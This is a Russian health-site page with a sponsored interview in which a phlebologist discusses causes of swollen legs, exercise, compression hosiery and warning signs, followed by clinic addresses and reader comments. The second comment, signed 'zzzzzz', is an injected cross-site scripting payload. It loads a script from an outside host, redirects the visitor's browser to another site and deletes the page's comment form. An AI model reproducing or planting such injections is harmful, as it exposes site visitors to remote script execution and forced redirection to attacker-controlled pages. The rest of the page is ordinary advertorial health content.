Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как спасти ноги от отеков  >>  Как спасти ноги от отеков
 
Обратная связь
 

Как спасти ноги от отеков

Размер шрифта
14 мая 2012 10:00
  • google_analytics: false
  • Нравится

После рабочего дня снимаете обувь и видите, что ступни и щиколотки припухли? К такой ситуации нельзя относиться легкомысленно. Если к тому же ноги отекают и болят, задумайтесь, все ли в порядке с вашим здоровьем? О причинах отеков и методах борьбы с ними, рассказывает заведующий отделением лимфологии и хронической венозной недостаточности «Центра Флебологии», врач-флеболог Евгений Сергеевич Сильчук.

Что стоит за проблемой отекших ног?

Отеки на ногах свидетельствуют о том, что женщина ведет малоподвижный образ жизни и носит узкую обувь. Врачи не рекомендуют ежедневно носить каблук выше 5-6 сантиметров. Отток крови и лимфы от ног осуществляется в основном за счет сократительной способности икроножных мышц. Если мышцы в тонусе – застоя не будет, а, значит, не будет и отека. Но если женщина ходит на высоких каблуках, икроножные мышцы практически не сокращаются. Возникает отек. Хочется снять обувь и вытянуть ноги, положить их повыше.

Это поможет?

Идеальный вариант – при сидячей работе поднимать ноги в конце каждого часа на 15 минут. Конечно, мало кто может себе такое позволить, но это действительно очень полезно. Происходит, так называемый, постуральный дренаж, когда кровь и лимфа под собственной тяжестью оттекает из опухших ног.

Есть и более простые, но столь же эффективные методы. Например, можно несколько раз подряд переступить с носка на пятку и обратно, разминая мышцы голени.

Наверное, и по лестницам полезно ходить?

Безусловно. Я всегда рекомендую своим пациентам не стоять в метро на эскалаторе, а проходить вверх. А вот спускаться по лестнице вниз совсем не так полезно – потому что каждый такой шаг дает гидростатический удар по сосудам. Подниматься по лестнице намного полезнее.

Евгений Сергеевич, какие виды спорта помогут избавиться от отеков ног?

В первую очередь, аквааэробикой: с одной стороны, человек много двигается, получая хорошую физическую нагрузку, с другой – вода оказывает давление на кожу, не давая сосудам расширяться, а ногам отекать. Очень полезно плавать в морской воде. Хороший эффект дают все динамичные виды спорта – бег, лыжи, велосипед, коньки, и даже простая ходьба. Если нет противопоказаний, любой человек в день должен проходить не меньше трех-пяти километров.

А чем заниматься не следует?

Вредны те виды спорта, которые часто приводят к травмам: горные лыжи, сноуборд… Да тот же футбол! Еще больший вред может принести тяжелая атлетика. Понятно, что многие люди хотят поддерживать себя в хорошей форме и для этого идут в тренажерные залы. Однако увлечение силовыми упражнениями с поднятием тяжестей не пойдет на пользу здоровью. Во время таких упражнений происходит сокращение мышц брюшного пресса, при этом увеличивается внутрибрюшное давление, переходящее на нижнюю полую вену, одну из самых главных вен нашего организма, которая собирает кровь от таза и нижних конечностей. Кровоток ухудшается. Всем, кто хочет заниматься на силовых тренажерах, я советую обязательно надевать на занятия качественный компрессионный трикотаж (колготки, чулки или гольфы).

Кстати, не очень полезны занятия статическими видами спорта, например, йога с растяжкой. Такие занятия не очень хорошо действуют на кровеносные сосуды.

Очень часто на отеки жалуются беременные женщины. Почему у них возникают проблемы с ногами?

Беременность – это очень сложный процесс. В организме женщины происходят серьезные изменения в области малого таза, в частности, увеличивается матка, которая начинает давить на крупные сосуды, расположенные вокруг. Ухудшается циркуляция крови, что и приводит к отекам. Имеют значение и гормональные изменения, которые происходят в женском организме во время беременности, они тоже часто приводят к возникновению отеков.

Что же делать беременным, которые хотят избежать подобных проблем?

Обычно с жалобами на отеки обращаются женщины на ранних сроках беременности. Я могу рассказать, что делаем мы в нашей клинике. Прежде всего, проводим всестороннюю диагностику. Понятно, что ни о каких радикальных лечебных процедурах, если нет серьезных осложнений, речи не идет. Мы рекомендуем только профилактические меры.

После диагностики, когда становится понятно, с какой проблемой мы имеем дело, обычно назначается лечебный трикотаж. Если отеки сильные, советуем носить его практически каждый день. На сегодня это самое эффективное средство для профилактики отеков и варикозного расширения вен нижних конечностей у беременных. При этом любая дополнительная физическая активность обязательно должна обсуждаться с гинекологом, кардиологом, терапевтом.

Могут ли отеки оказаться и симптомом какого-либо заболевания?

Могут. Появление отеков может говорить о проблемах с почками, сердцем, лимфатическими сосудами и т.д. Довольно часто причина кроется в варикозном расширении вен. И во всех этих случаях одними упражнениями и компрессионным трикотажем не обойтись – необходима полноценная диагностика и адекватное лечение.

Есть еще специальные мази от отеков…

Большинство подобных мазей обладает не лечебным, а профилактическим действием. Они могут улучшать микроциркуляцию крови и венозный отток, но не уберут первопричину появления отека.

То есть, если у женщины стали по вечерам чуть-чуть отекать ноги, ей уже стоит спешить к врачу?

Лично я считаю, что если возникают проблемы, всегда нужно обращаться за консультацией к специалисту. В первую очередь, к врачу-флебологу.

Профилактика всегда лучше, чем лечение. Недавно, например, на одном научном конгрессе мои французские коллеги рассказывали, как у них проходит диспансеризация молодежи. Всех девушек, которые проходят медицинский осмотр, обязательно спрашивают, есть ли у кого-то из членов их семьи варикоз. И если ответ положительный, то врач обязательно порекомендует им использовать для профилактики компрессионный трикотаж. При этом он рассказывает о причинах заболевания вен, объясняет, как правильно себя вести, как заботиться о здоровье ног.

К сожалению, в нашей стране принято обращаться к врачу только тогда, когда уже «гром грянул». О какой профилактике может тут говорить? А ведь развитие профилактической медицины во многом зависит от сознательности пациентов.

И все-таки, как понять, что тянуть с визитом к врачу уже нельзя?

Если ноги отекают систематически, если отек появившийся вечером не спадает к утру, если одновременно с отеками появились другие неприятные симптомы, или если ноги отекают очень сильно, это означает, что нужно срочно обратиться к врачу.

А о чем говорит сильный отек?

Сильные отеки ног – главный симптом очень серьезной болезни, которая называется лимфедема. Ее суть: нарушение нормального оттока лимфы через лимфатические сосуды). Если отеки, возникающие вечером, не исчезают к утру, если в местах отеков начинает изменяться кожа, то велика вероятность, что у человека лимфедема и следует срочно обращаться к специалисту.

Это лечится?

Лимфедема требует комплексной терапии, и в России не так много центров, которые занимаются подобными проблемами. Однако в нашей клинике мы смогли добиться значительных успехов, так что сейчас к нам даже приезжают лечиться пациенты из-за рубежа.

Евгений Сергеевич, говоря об отеках, вы чаще упоминали женщин. Разве у мужчин ноги реже отекают?

Отеки бывают, как у женщин, так и у мужчин. Это не болезнь, а сигнал о неблагополучии в организме, а уж в чем именно заключается проблема – должны разбираться специалисты. В любом случае, выжидать, что все как-нибудь «само пройдет», недопустимо.

«Центр Флебологии» - специализированная клиника по лечению и профилактике варикозной болезни

г. Москва 
м.Спортивная, ул. 10-летия Октября, д. 9 
м.Смоленская, пер. Сивцев Вражек, д. 45, стр.1 
м.Бауманская, ул. Радио, д. 10, стр.9 
тел.: (495) 925-75-11 

г. Санкт-Петербург 
ул. Комсомола, д. 14, этаж 2 
Невский пр-т, д. 111 
тел.: (812) 448-47-48

г. Екатеринбург 
ул. Шейнкмана, 111 
тел.: (343) 38-48-001

г. Нижний Новгород 
ул. Советская, д. 18 
тел.: (831) 249-43-07

г. Калининград
ул. Клубная, д.11
тел.: (4012) 57-34-66, 57-40-71

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - laleika

22 октября 2012 в 18:07

Цитировать   |   Пожаловаться

А если причина отека исключительно ортопедическая, какой смысл идти к врачам, ну точнее у врача я то была, но у меня отеки не связаны ни с сердцем, ни с почками, у меня плоскостопие - в таких ситуациях спасают ортопедические стельки и тромблесс гель, по крайней мере мне он больше всех остальных понравился. А вообще ходить нужно много, от малоподвижного образа жизни тоже отеки бывают, но в удобной обуви :)

2 - zzzzzz

30 июня 2015 в 23:42

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

3 - Гость

17 ноября 2016 в 09:28

Цитировать   |   Пожаловаться

У меня ноги очень сильно отекают после работы, хоть и работаю два через два но иногда больше 12 часов в смене получается. Снизить отечность мне помогли стельки шоль для работы, купила их по совету коллеги. И занялась активным образом жизни стала ходить на фитнес и дома делать физические упражнения. Теперь после 12-часового дня ноги устают значительно меньше и не так сильно отекают.

Статьи

       
Как правильно ходить в старости   Как подготовить ноги к старости   Самые страшные боли на свете   3 движения, чтобы ноги не отвалились после туфель  

Слайдшоу

1
Вы ходите неправильно!
Самые неожиданные симптомы больного сердца
Как же избавиться от мешков под глазами

Тесты

Есть ли у вас варикозное расширение вен?
Как облегчить менопаузу?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.